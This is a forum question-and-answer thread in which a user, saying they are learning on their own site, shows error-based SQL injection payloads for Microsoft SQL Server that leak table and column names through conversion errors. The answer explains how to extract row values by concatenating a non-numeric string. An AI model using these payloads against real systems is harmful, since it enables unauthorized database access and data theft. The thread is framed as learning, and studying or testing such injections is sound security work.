0

Learning sql injection. i have found a sql injection on my site.

i can able to execute following query and retrieve table names and column name

Tablenames:

convert(int,(select top 1 table_name from information_schema.tables))

Columnames:

convert(int,(select top 1 column_name from information_schema.columns where table_name='customer' and column name not in('id'))



> Table structure:
> 
> id nvarchar custid nvarchar

rows:

id custid --------- 1 1000 2 1001

i have found the following structre of the table.

But now i could not able to get the values in the row..

Tried:

convert(int,(select top 1 id from customer))--

in this query, it doesn't show any error and i could not get the row value.

Thought:

eventhough "id" column type is "nvarchar" it stores integer values, so on converting into int, doesn't cause error??

how to get values of row in this case??

Improve this question

1 Answer 1

Reset to default
1

You could concatenate a non-numeric string, such as convert(int,(select top 1 'id:' + id from customer))--

And if you're looking for what's in an int field, cast it to varchar(10) and then concatenate with non-numeric string.

But don't use this for evil...

Improve this answer
Sign up to request clarification or add additional context in comments.

1 Comment

i tried concatenating but it does works.. yeah sure i will not use for evil purpose..

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.